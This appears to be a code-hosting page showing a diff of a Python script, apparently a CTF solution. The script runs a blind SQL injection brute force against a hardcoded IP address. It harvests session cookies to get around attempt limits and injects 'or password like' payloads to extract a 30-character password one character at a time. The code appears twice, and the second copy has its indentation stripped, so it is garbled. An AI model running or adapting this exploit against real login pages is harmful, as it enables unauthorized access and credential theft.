nmcv · February 24, 2014 10:53 · nmcv · Feb 24, 2014
diff --git a/brute_server.py b/brute_server.py
 #!/bin/env python3

 import string
 import urllib
 from urllib.request import urlopen
 import requests  # <- bitch (always URL-encodes POST data)

 url = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php"
 cookie_jar = []
 cnt = 0
 cnt_max = 120
 password = ''


 # Fetch 10 cookies (yummm!)
 print("Obtaining PHPSESSID's:")
 while cnt < 10:
    payload = {"password": "'+'{}%".format("")}
    r = requests.post(url, data=payload)
    print(r.cookies['PHPSESSID'])
    cookie_jar.append(r.cookies['PHPSESSID'])
    cnt += 1


 print("Bruteforcing password:")

 # Plug in the first cookie
 cookie = iter(cookie_jar)
 current_cookie = next(cookie)
 print("Using cookie {}".format(current_cookie))


 # Attempts allowed
 cnt = 120


 for i in range(30):  # password length is 30

    # a..z
    for ch in string.ascii_lowercase:

        # If there are not enough attempts -> supply another cookie
        if cnt == 1:
            current_cookie = next(cookie)
            print("Using cookie {}".format(current_cookie))
            cnt = 120

        print("Trying the next char: {}".format(ch))
        current_payload = \
            bytes("password='+or+password+like+'{}%".format(password + ch), 'ascii')

        #print("Payload: {}".format(current_payload))

        req = urllib.request.Request(url, current_payload)
        req.add_header('Cookie', "PHPSESSID={}".format(current_cookie))
        req.add_header('Content-Length', str(len(current_payload)))
        cnt -= 1
        response = urlopen(req)
        response_text = response.read()
        #print("Response: {}".format(response_text))

        if response_text.endswith(b"True"):

            password += ch

            print("Found next char {} (attempts left = {}, current password = {})".format(ch, cnt, password))

            break
	#!/bin/env python3

	import string
	import urllib
	from urllib.request import urlopen
	import requests # <- bitch (always URL-encodes POST data)

	url = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php"
	cookie_jar = []
	cnt = 0
	cnt_max = 120
	password = ''


	# Fetch 10 cookies (yummm!)
	print("Obtaining PHPSESSID's:")
	while cnt < 10:
	payload = {"password": "'+'{}%".format("")}
	r = requests.post(url, data=payload)
	print(r.cookies['PHPSESSID'])
	cookie_jar.append(r.cookies['PHPSESSID'])
	cnt += 1


	print("Bruteforcing password:")

	# Plug in the first cookie
	cookie = iter(cookie_jar)
	current_cookie = next(cookie)
	print("Using cookie {}".format(current_cookie))


	# Attempts allowed
	cnt = 120


	for i in range(30): # password length is 30

	# a..z
	for ch in string.ascii_lowercase:

	# If there are not enough attempts -> supply another cookie
	if cnt == 1:
	current_cookie = next(cookie)
	print("Using cookie {}".format(current_cookie))
	cnt = 120

	print("Trying the next char: {}".format(ch))
	current_payload = \
	bytes("password='+or+password+like+'{}%".format(password + ch), 'ascii')

	#print("Payload: {}".format(current_payload))

	req = urllib.request.Request(url, current_payload)
	req.add_header('Cookie', "PHPSESSID={}".format(current_cookie))
	req.add_header('Content-Length', str(len(current_payload)))
	cnt -= 1
	response = urlopen(req)
	response_text = response.read()
	#print("Response: {}".format(response_text))

	if response_text.endswith(b"True"):

	password += ch

	print("Found next char {} (attempts left = {}, current password = {})".format(ch, cnt, password))

	break